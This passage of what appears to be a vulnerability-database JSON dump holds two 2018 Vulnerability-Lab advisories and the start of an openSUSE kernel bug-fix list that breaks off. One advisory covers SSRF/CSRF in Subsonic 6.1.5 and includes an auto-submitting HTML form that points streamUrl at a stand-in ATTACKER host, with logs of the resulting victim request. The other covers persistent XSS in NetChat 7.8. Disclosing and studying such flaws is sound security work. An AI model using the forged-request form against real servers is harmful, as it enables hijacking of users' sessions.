1.000\u20ac\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nSubsonic is an easy-to-use media streaming service with a user-friendly interface and the ability to share music and video \r\nwith multiple users. It is highly customizable and includes features such as Chromecast support and file conversion.\r\n\r\n(Copy of the Homepage: https://www.linode.com/docs/applications/media-servers/install-subsonic-media-server-on-ubuntu-or-debian/ )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe vulnerability laboratory core research team discovered a server-side request forgery and csrf issue in the official Subsonic v6.1.5 for microsoft windows.\r\n\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2018-12-17: Public Disclosure (Vulnerability Laboratory)\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nSubsonic AS\r\nProduct: Subsonic - Media Streaming Service (Web-Application) 6.1.5 (Windows, MacOS, Debian, Ubuntu, Fedora, Synology NAS)\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\nAuthentication Type:\r\n====================\r\nPre auth - no privileges\r\n\r\n\r\nUser Interaction:\r\n=================\r\nMedium User Interaction\r\n\r\n\r\nDisclosure Type:\r\n================\r\nIndependent Security Research\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nA ssrf vulnerability and csrf issue has been discovered in the official Subsonic v6.1.5 for microsoft windows.\r\nThe security vulnerability allows remote attackers to hijack the authentication of users for requests that visites a internet radio.\r\n\r\nThe vulnerability is located in the `internetRadioSettings.view` module and the `streamUrl` parameter of the localhost path URL. \r\nRemote attackers are able to conduct server-side request forgery (ssrf) attacks combined with a cross site request forgery issue. \r\nBoth together can allow a remote attacker to hijack the authentication for stream of internet radios.\r\n\r\nThe security risk of the ssrf web vulnerability and cross site request forgery issue is estimated as medium with a cvss count of 4.1.\r\nExploitation of the ssrf and csrf vulnerability requires a low privilege web-application user account and low or medium user interaction. \r\n\r\nRequest Method(s):\r\n[+] POST\r\n\r\nVulnerable Parameter:\r\n[+] streamUrl\r\n\r\nVulnerable Module(s):\r\n[+] internetRadioSettings.view\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe security vulnerability can be exploited by remote attackers a low privilege web-application user account and with low or medium user interaction.\r\nFor security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.\r\n\r\n\r\nPoC: Exploitation\r\n<html>\r\n <body>\r\n <form id=\"test\" action=\"http://localhost:4040/internetRadioSettings.view\" method=\"POST\">\r\n <input type=\"hidden\" name=\"name\" value=\"NAME\" />\r\n <input type=\"hidden\" name=\"streamUrl\" value=\"http://ATTACKER:8080\" />\r\n <input type=\"hidden\" name=\"homepageUrl\" value=\"\" />\r\n <input type=\"hidden\" name=\"enabled\" value=\"on\" />\r\n </form>\r\n <script>document.getElementById('test').submit();</script>\r\n </body>\r\n</html>\r\n\r\n\r\n\r\n--- PoC Session Logs ---\r\nhttp://localhost:4040/internetRadioSettings.view\r\nHost: localhost:4040\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://ATTACKER:8080/poc.html\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 77\r\nConnection: keep-alive\r\nCookie: player-61646d696e=2; JSESSIONID=hy5rv1nhc82c; DWRSESSIONID=8wm6J5vYUR!zJF6xZ9Df9FykouYTtQ!RAum\r\nUpgrade-Insecure-Requests: 1\r\nname=NAME&streamUrl=http://ATTACKER:8080&homepageUrl=&enabled=on\r\nPOST: HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Language: en\r\nContent-Length: 8354\r\nServer: *****\r\n\r\n\r\nThen waiting for victim to visit [ Internet radio ] \r\nServing HTTP on 0.0.0.0 port 8080 ...\r\nVICTIM - - [**/Dec/2018 **:**:**] \"GET / HTTP/1.1\" 200 -\r\n\r\n\r\nVulnerable Source:\r\n<form method=\"post\" action=\"internetRadioSettings.view\">\r\n<table class=\"indent\">\r\n <tbody><tr>\r\n <th>Name</th>\r\n <th>Stream URL</th>\r\n <th>Homepage</th>\r\n <th style=\"padding-left:1em\">Enabled</th>\r\n <th style=\"padding-left:1em\">Delete</th>\r\n </tr>\r\n <tr>\r\n <td><input type=\"text\" name=\"name[3]\" size=\"20\" value=\"NAME\"></td>\r\n <td><input type=\"text\" name=\"streamUrl[3]\" size=\"40\" value=\"http://ATTACKER:8080\"></td>\r\n <td><input type=\"text\" name=\"homepageUrl[3]\" size=\"40\" value=\"\"></td>\r\n <td style=\"padding-left:1em\" align=\"center\"><input type=\"checkbox\" checked=\"\" name=\"enabled[3]\" class=\"checkbox\"></td>\r\n <td style=\"padding-left:1em\" align=\"center\"><input type=\"checkbox\" name=\"delete[3]\" class=\"checkbox\"></td>\r\n </tr>\r\n <tr>\r\n <th colspan=\"5\" style=\"padding-top:1em\" align=\"left\">Add radio station</th>\r\n </tr>\r\n <tr>\r\n <td><input type=\"text\" name=\"name\" size=\"20\" placeholder=\"Name\"></td>\r\n <td><input type=\"text\" name=\"streamUrl\" size=\"40\" placeholder=\"Stream URL\"></td>\r\n <td><input type=\"text\" name=\"homepageUrl\" size=\"40\" placeholder=\"Homepage\"></td>\r\n <td style=\"padding-left:1em\" align=\"center\"><input name=\"enabled\" checked=\"\" type=\"checkbox\" class=\"checkbox\"></td>\r\n <td>\r\n </td></tr>\r\n\r\n <tr>\r\n <td style=\"padding-top:1.5em\" colspan=\"5\">\r\n <input type=\"submit\" value=\"Save\" style=\"margin-right:0.3em\">\r\n <input type=\"button\" value=\"Cancel\" onclick=\"location.href='nowPlaying.view'\">\r\n </td>\r\n </tr>\r\n</tbody></table>\r\n</form>\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the server-side request forgery (ssrf) via cross site request forgery (csrf) in subsonic v6.1.5 product is estimated as medium.\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nS.AbenMassaoud [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab \r\nor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits \r\nor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do \r\nnot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. \r\nWe do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.\r\n\r\nDomains: www.vulnerability-lab.com\t\twww.vuln-lab.com\t\t\t\twww.vulnerability-db.com\r\nServices: magazine.vulnerability-lab.com\tpaste.vulnerability-db.com \t\t\tinfosec.vulnerability-db.com\r\nSocial:\t twitter.com/vuln_lab\t\tfacebook.com/VulnerabilityLab \t\t\tyoutube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php \tvulnerability-lab.com/rss/rss_upcoming.php \tvulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \tvulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other \r\ninformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or \r\nedit our material contact (admin@ or research@) to get a ask permission.\r\n\r\n\t\t\t\t Copyright \u00a9 2018 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-17T03:15:02", "references": [], "description": "", "edition": 1, "reporter": "Benjamin K.M. [bkm@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.", "published": "2018-12-17T00:00:00", "title": "NetChat v7.8 - Persistent Cross Site Scripting Vulnerability", "type": "vulnerlab", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-12-17T00:00:00", "id": "VULNERLAB:2171", "href": "http://www.vulnerability-lab.com/get_content.php?id=2171", "sourceData": "Document Title:\r\n===============\r\nNetChat v7.8 - Persistent Cross Site Scripting Vulnerability\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttps://www.vulnerability-lab.com/get_content.php?id=2171\r\n\r\nVideo: https://www.vulnerability-lab.com/get_content.php?id=2174\r\n\r\n\r\nRelease Date:\r\n=============\r\n2018-12-17\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n2171\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n4.3\r\n\r\n\r\nVulnerability Class:\r\n====================\r\nCross Site Scripting - Persistent\r\n\r\n\r\nCurrent Estimated Price:\r\n========================\r\n500\u20ac - 1.000\u20ac\r\n\r\n\r\nProduct & Service Introduction:\r\n===============================\r\nChat with other local users. You can create a fixed user which can be located in another subnet. This user can act as \r\na gateway which connects both NetChat subnets together. A build-in HTTP server can be used to share pictures and \r\nother files. For users which are currently offline, the message can left on an FTP server.\r\n\r\n(Copy of the Homepage: https://www.the-sz.com/products/netchat/ )\r\n\r\n\r\nAbstract Advisory Information:\r\n==============================\r\nThe vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the official SZ NetChat v7.8 software.\r\n\r\n\r\nVulnerability Disclosure Timeline:\r\n==================================\r\n2018-12-10: Researcher Notification & Coordination (Security Researcher)\r\n2018-12-10: Vendor Notification (Product Developer Team)\r\n2018-12-11: Vendor Response/Feedback (Product Developer Team)\r\n2018-12-12: Vendor Fix/Patch (Product Developer Team)\r\n2018-12-14: Security Acknowledgements (Product Developer Team)\r\n2018-12-17: Public Disclosure (Vulnerability Laboratory)\r\n\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nAffected Product(s):\r\n====================\r\nThe SZ Development\r\nProduct: NetChat - Software Client (Windows) 7.8\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\nAuthentication Type:\r\n====================\r\nRestricted authentication (user/moderator) - User privileges\r\n\r\n\r\nUser Interaction:\r\n=================\r\nLow User Interaction\r\n\r\n\r\nDisclosure Type:\r\n================\r\nIndependent Security Research\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nA persistent cross site scripting vulnerability has been discovered in the official SZ NetChat v7.8 software.\r\nThe web vulnerability allows local attacker to inject own malicious commands to compromise the http-server.\r\n\r\nThe vulnerability is located in the `MyName` input field of the `Options` module. Local attackers are \r\nable to inject own malicious commands as name by usage of the software client, to compromise the enabled \r\nhttp server web frontend. The validation of the MyName input is insecure handled and the output location of \r\nthe web frontend does not sanitize the transmitted context.\r\n\r\nThe security risk of the cross site web vulnerability is estimated as medium with a cvss count of 3.8.\r\nExploitation of the issue requires a privileged application user account and only low user interaction. \r\nSuccessful exploitation of the application-side vulnerability results in persistent phishing, persistent \r\nexternal redirects and persistent manipulation affected or connected module context.\r\n\r\n\r\nVulnerable Module(s):\r\n[+] Options \r\n\r\nVulnerable Input(s):\r\n[+] MyName\r\n\r\nAffected Module(s):\r\n[+] HTTP-Server (Web Frontend)\r\n\r\n\r\nProof of Concept (PoC):\r\n=======================\r\nThe xss vulnerability can be exploited by authenticated remote attackers with low user interaction.\r\nFor security demonstration or to reproduce the issue follow the provided information or steps below.\r\n\r\n\r\nManual steps to reproduce ...\r\n1. Download and install the software client with http server\r\n2. Start the software and open the options tab\r\n3. Inject to the MyName value your malicious test script code\r\n4. Click the \"Change\" button to save the settings\r\n5. Open the tab HTTP Server and click the checkbox to enable\r\n6. The code executes on open of the main directory and as well in http server exception handling\r\n7. Successful reproduce of the persistent cross site vulnerability!\r\n\r\nNote: Each user can connect to the HTTP server of other users via user list or chat. An attacker can manipulate his \r\nown service and wait until the server is active and a user accesses his enabled HTTP server.\r\n\r\n\r\nPoC: Exploitation\r\n<html><head><title>HTTP server from a \"><[MALICIOUS PERSISTENT INJECTED SCRIPT CODE!]></title></head><body bgcolor=\"#3399FF\">\r\n<h3 align=\"center\"><font face=\"Verdana\" color=\"#FFFFFF\"><i>HTTP server from a \"><[MALICIOUS PERSISTENT INJECTED SCRIPT CODE!]></i></font></h3>\r\n<h5 align=\"center\"><font face=\"Verdana\" color=\"#FFFFFF\"><i>TEST/</i></font></h5><br><br></body></html>\r\n\r\n\r\nSolution - Fix & Patch:\r\n=======================\r\n1. The cross site scripting vulnerability can be patched by a parse of the content inside of the myname input field.\r\n2. Restrict the input and disallow the usage of special chars to prevent cross site scripting or other validation bugs.\r\n3. Parse in the http-server the output locations were the myname value is being displayed during sharing.\r\n\r\nThe sz software developer team resolved the vulnerability 2018-12-12 and discovered the version 7.9 as stable release.\r\n\r\nPublic Patched v7.9: http://www.the-sz.com/common/get.php?product=netchat\r\n\r\n\r\nSecurity Risk:\r\n==============\r\nThe security risk of the persistent cross site scripting web vulnerability in the netchat software is estimated as medium.\r\nThe risk impact is as well medium because of users are able to access with one click the web-server of an attacker by enable.\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nBenjamin K.M. [bkm@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab \r\nor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits \r\nor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do \r\nnot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. \r\nWe do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.\r\n\r\nDomains: www.vulnerability-lab.com\t\twww.vuln-lab.com\t\t\t\twww.vulnerability-db.com\r\nServices: magazine.vulnerability-lab.com\tpaste.vulnerability-db.com \t\t\tinfosec.vulnerability-db.com\r\nSocial:\t twitter.com/vuln_lab\t\tfacebook.com/VulnerabilityLab \t\t\tyoutube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php \tvulnerability-lab.com/rss/rss_upcoming.php \tvulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \tvulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other \r\ninformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or \r\nedit our material contact (admin@ or research@) to get a ask permission.\r\n\r\n\t\t\t\t Copyright \u00a9 2018 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2018-12-18T02:14:14", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1116285", "https://bugzilla.opensuse.org/show_bug.cgi?id=1117562", "https://bugzilla.opensuse.org/show_bug.cgi?id=1109330", "https://bugzilla.opensuse.org/show_bug.cgi?id=1027457", "https://bugzilla.opensuse.org/show_bug.cgi?id=1046264", "https://bugzilla.opensuse.org/show_bug.cgi?id=1115709", "https://bugzilla.opensuse.org/show_bug.cgi?id=1012382", "https://bugzilla.opensuse.org/show_bug.cgi?id=1106240", "https://bugzilla.opensuse.org/show_bug.cgi?id=1066223", "https://bugzilla.opensuse.org/show_bug.cgi?id=1115440", "https://bugzilla.opensuse.org/show_bug.cgi?id=1113412", "https://bugzilla.opensuse.org/show_bug.cgi?id=1104731", "https://bugzilla.opensuse.org/show_bug.cgi?id=1116950", "https://bugzilla.opensuse.org/show_bug.cgi?id=1114190", "https://bugzilla.opensuse.org/show_bug.cgi?id=1113766", "https://bugzilla.opensuse.org/show_bug.cgi?id=1114475", "https://bugzilla.opensuse.org/show_bug.cgi?id=1114763", "https://bugzilla.opensuse.org/show_bug.cgi?id=1111062", "https://bugzilla.opensuse.org/show_bug.cgi?id=1111809", "https://bugzilla.opensuse.org/show_bug.cgi?id=1115433", "https://bugzilla.opensuse.org/show_bug.cgi?id=1114839", "https://bugzilla.opensuse.org/show_bug.cgi?id=1103624", "https://bugzilla.opensuse.org/show_bug.cgi?id=1107385", "https://bugzilla.opensuse.org/show_bug.cgi?id=1108145", "https://bugzilla.opensuse.org/show_bug.cgi?id=1116497", "https://bugzilla.opensuse.org/show_bug.cgi?id=1106105", "https://bugzilla.opensuse.org/show_bug.cgi?id=985031", "https://bugzilla.opensuse.org/show_bug.cgi?id=1116924", "https://bugzilla.opensuse.org/show_bug.cgi?id=1109806", "https://bugzilla.opensuse.org/show_bug.cgi?id=1094973", "https://bugzilla.opensuse.org/show_bug.cgi?id=1112246", "https://bugzilla.opensuse.org/show_bug.cgi?id=1042286", "https://bugzilla.opensuse.org/show_bug.cgi?id=1102439", "https://bugzilla.opensuse.org/show_bug.cgi?id=1112963", "https://bugzilla.opensuse.org/show_bug.cgi?id=1106237"], "pluginID": "119709", "description": "The openSUSE Leap 42.3 kernel was updated to 4.4.165-81.1 to receive various bugfixes.\n\nThe following non-security bugs were fixed :\n\n - 9p locks: fix glock.client_id leak in do_lock (bnc#1012382).\n\n - 9p: clear dangling pointers in p9stat_free (bnc#1012382).\n\n - ACPI / LPSS: Add alternative ACPI HIDs for Cherry Trail DMA controllers (bnc#1012382).\n\n - ACPI / platform: Add SMB0001 HID to forbidden_id_list (bnc#1012382).\n\n - ALSA: ca0106: Disable IZD on SB0570 DAC to fix audio pops (bnc#1012382).\n\n - ALSA: hda - Add mic quirk for the Lenovo G50-30 (17aa:3905) (bnc#1012382).\n\n - ALSA: hda: Check the non-cached stream buffers more explicitly (bnc#1012382).\n\n - ALSA: timer: Fix zero-division by continue of uninitialized instance (bnc#1012382).\n\n - ARM64: PCI: ACPI support for legacy IRQs parsing and consolidation with DT code (bsc#985031).\n\n - ARM: 8799/1: mm: fix pci_ioremap_io() offset check (bnc#1012382).\n\n - ARM: dts: apq8064: add ahci ports-implemented mask (bnc#1012382).\n\n - ARM: dts: imx53-qsb: disable 1.2GHz OPP (bnc#1012382).\n\n - ASoC: ak4613: Enable cache usage to fix crashes on resume (bnc#1012382).\n\n - ASoC: spear: fix error return code in spdif_in_probe() (bnc#1012382).\n\n - ASoC: wm8940: Enable cache usage to fix crashes on resume (bnc#1012382).\n\n - Bluetooth: SMP: fix crash in unpairing (bnc#1012382).\n\n - Bluetooth: btbcm: Add entry for BCM4335C0 UART bluetooth (bnc#1012382).\n\n - Btrfs: fix data corruption due to cloning of eof block (bnc#1012382).\n\n - Btrfs: fix NULL pointer dereference on compressed write path error (bnc#1012382).\n\n - Btrfs: fix wrong dentries after fsync of file that got its parent replaced (bnc#1012382).\n\n - CIFS: handle guest access errors to Windows shares (bnc#1012382).\n\n - Cramfs: fix abad comparison when wrap-arounds occur (bnc#1012382).\n\n - Fix kABI for 'Ensure we commit after writeback is complete' (bsc#1111809).\n\n - HID: hiddev: fix potential Spectre v1 (bnc#1012382).\n\n - HID: uhid: forbid UHID_CREATE under KERNEL_DS or elevated privileges (bnc#1012382).\n\n - IB/ucm: Fix Spectre v1 vulnerability (bnc#1012382).\n\n - Input: elan_i2c - add ACPI ID for Lenovo IdeaPad 330-15IGM (bnc#1012382).\n\n - KEYS: put keyring if install_session_keyring_to_cred() fails (bnc#1012382).\n\n - KVM: nVMX: Always reflect #NM VM-exits to L1 (bsc#1106240).\n\n - MD: fix invalid stored role for a disk (bnc#1012382).\n\n - MD: fix invalid stored role for a disk - try2 (bnc#1012382).\n\n - MIPS: DEC: Fix an int-handler.S CPU_DADDI_WORKAROUNDS regression (bnc#1012382).\n\n - MIPS: Fix FCSR Cause bit handling for correct SIGFPE issue (bnc#1012382).\n\n - MIPS: Handle non word sized instructions when examining frame (bnc#1012382).\n\n - MIPS: Loongson-3: Fix BRIDGE irq delivery problem (bnc#1012382).\n\n - MIPS: Loongson-3: Fix CPU UART irq delivery problem (bnc#1012382).\n\n - MIPS: OCTEON: fix out of bounds array access on CN68XX (bnc#1012382).\n\n - MIPS: kexec: Mark CPU offline before disabling local IRQ (bnc#1012382).\n\n - MIPS: microMIPS: Fix decoding of swsp16 instruction (bnc#1012382).\n\n - NFS: Ensure we commit after writeback is complete (bsc#1111809).\n\n - NFSv4.1: Fix the r/wsize checking (bnc#1012382).\n\n - PCI/ASPM: Do not initialize link state when aspm_disabled is set (bsc#1109806).\n\n - PCI/ASPM: Fix link_state teardown on device removal (bsc#1109806).\n\n - PCI: Add Device IDs for Intel GPU 'spurious interrupt' quirk (bnc#1012382).\n\n - PCI: vmd: Detach resources after stopping root bus (bsc#1106105).\n\n - PM / devfreq: tegra: fix error return code in tegra_devfreq_probe() (bnc#1012382).\n\n - Provide a temporary fix for STIBP on-by-default See bsc#1116497 for details.\n\n - RDMA/ucma: Fix Spectre v1 vulnerability (bnc#1012382).\n\n - Reorder a few commits in kGraft out of tree section\n\n - Revert 'Bluetooth: h5: Fix missing dependency on BT_HCIUART_SERDEV' (bnc#1012382).\n\n - Revert 'ceph: fix dentry leak in splice_dentry()' (bsc#1114839).\n\n - Revert 'media: v4l: event: Add subscription to list before calling 'add' operation' (kabi).\n\n - Revert 'media: videobuf2-core: do not call memop 'finish' when queueing' (bnc#1012382).\n\n - Revert 'x86/kconfig: Fall back to ticket spinlocks' (kabi).\n\n - SUNRPC: drop pointless static qualifier in xdr_get_next_encode_buffer() (bnc#1012382).\n\n - TC: Set DMA masks for devices (bnc#1012382).\n\n - USB: fix the usbfs flag sanitization for control transfers (bnc#1012382).\n\n - USB: misc: appledisplay: add 20' Apple Cinema Display (bnc#1012382).\n\n - USB: quirks: Add no-lpm quirk for Raydium touchscreens (bnc#1012382).\n\n - af_iucv: Move sockaddr length checks to before accessing sa_family in bind and connect handlers (bnc#1012382).\n\n - ahci: do not ignore result code of ahci_reset_controller() (bnc#1012382).\n\n - amd/iommu: Fix Guest Virtual APIC Log Tail Address Register (bsc#1106105).\n\n - arch/alpha, termios: implement BOTHER, IBSHIFT and termios2 (bnc#1012382).\n\n - arm64: Disable asm-operand-width warning for clang (bnc#1012382).\n\n - arm64: dts: stratix10: Correct System Manager register size (bnc#1012382).\n\n - arm64: hardcode rodata_enabled=true earlier in the series (bsc#1114763). \n\n - arm64: percpu: Initialize ret in the default case (bnc#1012382).\n\n - arm: fix mis-applied iommu identity check (bsc#1116924). \n\n - asix: Check for supported Wake-on-LAN modes (bnc#1012382).\n\n - ataflop: fix error handling during setup (bnc#1012382).\n\n - ath10k: schedule hardware restart if WMI command times out (bnc#1012382).\n\n - ax88179_178a: Check for supported Wake-on-LAN modes (bnc#1012382).\n\n - bcache: fix miss key refill->end in writeback (bnc#1012382).\n\n - binfmt_elf: fix calculations for bss padding (bnc#1012382).\n\n - bitops: protect variables in bit_clear_unless() macro (bsc#1116285).\n\n - block: fix inheriting request priority from bio (bsc#1116924).\n\n - block: respect virtual boundary mask in bvecs (bsc#1113412).\n\n - bna: ethtool: Avoid reading past end of buffer (bnc#1012382).\n\n - bpf: generally move prog destruction to RCU deferral (bnc#1012382).\n\n - bridge: do not add port to router list when receives query with source 0.0.0.0 (bnc#1012382).\n\n - btrfs: Handle owner mismatch gracefully when walking up tree (bnc#1012382).\n\n - btrfs: do not attempt to trim devices that do not support it (bnc#1012382).\n\n - btrfs: fix backport error in submit_stripe_bio (bsc#1114763).\n\n - btrfs: fix pinned underflow after transaction aborted (bnc#1012382).\n\n - btrfs: iterate all devices during trim, instead of fs_devices::alloc_list (bnc#1012382).\n\n - btrfs: locking: Add extra check in btrfs_init_new_buffer() to avoid deadlock (bnc#1012382).\n\n - btrfs: make sure we create all new block groups (bnc#1012382).\n\n - btrfs: qgroup: Dirty all qgroups before rescan (bnc#1012382).\n\n - btrfs: reset max_extent_size on clear in a bitmap (bnc#1012382).\n\n - btrfs: set max_extent_size properly (bnc#1012382).\n\n - btrfs: wait on caching when putting the bg cache (bnc#1012382).\n\n - cachefiles: fix the race between cachefiles_bury_object() and rmdir(2) (bnc#1012382).\n\n - cdc-acm: correct counting of UART states in serial state notification (bnc#1012382).\n\n - ceph: call setattr_prepare from ceph_setattr instead of inode_change_ok (bsc#1114763).\n\n - ceph: fix dentry leak in ceph_readdir_prepopulate (bsc#1114839).\n\n - ceph: quota: fix NULL pointer dereference in quota check (bsc#1114839).\n\n - cfg80211: reg: Init wiphy_idx in regulatory_hint_core() (bnc#1012382).\n\n - clk: s2mps11: Add used attribute to s2mps11_dt_match (git-fixes).\n\n - clk: s2mps11: Fix matching when built as module and DT node contains compatible (bnc#1012382).\n\n - clk: samsung: exynos5420: Enable PERIS clocks for suspend (bnc#1012382).\n\n - clockevents/drivers/i8253: Add support for PIT shutdown quirk (bnc#1012382).\n\n - configfs: replace strncpy with memcpy (bnc#1012382).\n\n - cpuidle: Do not access cpuidle_devices when !CONFIG_CPU_IDLE (bnc#1012382).\n\n - crypto, x86: aesni - fix token pasting for clang (bnc#1012382).\n\n - crypto: arm64/sha - avoid non-standard inline asm tricks (bnc#1012382).\n\n - crypto: lrw - Fix out-of bounds access on counter overflow (bnc#1012382).\n\n - crypto: shash - Fix a sleep-in-atomic bug in shash_setkey_unaligned (bnc#1012382).\n\n - cxgb4: Add support for new flash parts (bsc#1102439).\n\n - cxgb4: Fix FW flash errors (bsc#1102439).\n\n - cxgb4: assume flash part size to be 4MB, if it can't be determined (bsc#1102439).\n\n - cxgb4: fix missing break in switch and indent return statements (bsc#1102439).\n\n - cxgb4: support new ISSI flash parts (bsc#1102439).\n\n - dm ioctl: harden copy_params()'s copy_from_user() from malicious users (bnc#1012382).\n\n - dm raid: stop using BUG() in __rdev_sectors() (bsc#1046264).\n\n - dmaengine: dma-jz4780: Return error if not probed from DT (bnc#1012382).\n\n - dpaa_eth: fix dpaa_get_stats64 to match prototype (bsc#1114763).\n\n - driver/dma/ioat: Call del_timer_sync() without holding prep_lock (bnc#1012382).\n\n - drivers/misc/sgi-gru: fix Spectre v1 vulnerability (bnc#1012382).\n\n - drm/ast: Remove existing framebuffers before loading driver (boo#1112963)\n\n - drm/dp_mst: Check if primary mstb is null (bnc#1012382).\n\n - drm/hisilicon: hibmc: Do not carry error code in HiBMC framebuffer (bsc#1113766)\n\n - drm/hisilicon: hibmc: Do not overwrite fb helper surface depth (bsc#1113766)\n\n - drm/i915/hdmi: Add HDMI 2.0 audio clock recovery N values (bnc#1012382).\n\n - drm/nouveau/fbcon: fix oops without fbdev emulation (bnc#1012382).\n\n - drm/omap: fix memory barrier bug in DMM driver (bnc#1012382).\n\n - drm/rockchip: Allow driver to be shutdown on reboot/kexec (bnc#1012382).\n\n - e1000: avoid NULL pointer dereference on invalid stat type (bnc#1012382).\n\n - e1000: fix race condition between e1000_down() and e1000_watchdog (bnc#1012382).\n\n - efi/libstub/arm64: Force 'hidden' visibility for section markers (bnc#1012382).\n\n - efi/libstub/arm64: Set -fpie when building the EFI stub (bnc#1012382).\n\n - ext4: add missing brelse() add_new_gdb_meta_bg()'s error path (bnc#1012382).\n\n - ext4: add missing brelse() in set_flexbg_block_bitmap()'s error path (bnc#1012382).\n\n - ext4: add missing brelse() update_backups()'s error path (bnc#1012382).\n\n - ext4: avoid buffer leak in ext4_orphan_add() after prior errors (bnc#1012382).\n\n - ext4: avoid possible double brelse() in add_new_gdb() on error path (bnc#1012382).\n\n - ext4: avoid potential extra brelse in setup_new_flex_group_blocks() (bnc#1012382).\n\n - ext4: fix argument checking in EXT4_IOC_MOVE_EXT (bnc#1012382).\n\n - ext4: fix buffer leak in __ext4_read_dirblock() on error path (bnc#1012382).\n\n - ext4: fix buffer leak in ext4_xattr_move_to_block() on error path (bnc#1012382).\n\n - ext4: fix missing cleanup if ext4_alloc_flex_bg_array() fails while resizing (bnc#1012382).\n\n - ext4: fix possible inode leak in the retry loop of ext4_resize_fs() (bnc#1012382).\n\n - ext4: fix possible leak of sbi->s_group_desc_leak in error path (bnc#1012382).\n\n - ext4: initialize retries variable in ext4_da_write_inline_data_begin() (bnc#1012382).\n\n - ext4: release bs.bh before re-using in ext4_xattr_block_find() (bnc#1012382).\n\n - fcoe: remove duplicate debugging message in fcoe_ctlr_vn_add (bsc#1114763).\n\n - flow_dissector: do not dissect l4 ports for fragments (bnc#1012382).\n\n - fs, elf: make sure to page align bss in load_elf_library (bnc#1012382).\n\n - fs/exofs: fix potential memory leak in mount option parsing (bnc#1012382).\n\n - fs/fat/fatent.c: add cond_resched() to fat_count_free_clusters() (bnc#1012382).\n\n - fscache: fix race between enablement and dropping of object (bsc#1107385).\n\n - fuse: Dont call set_page_dirty_lock() for ITER_BVEC pages for async_dio (bnc#1012382).\n\n - fuse: Fix use-after-free in fuse_dev_do_read() (bnc#1012382).\n\n - fuse: Fix use-after-free in fuse_dev_do_write() (bnc#1012382).\n\n - fuse: fix blocked_waitq 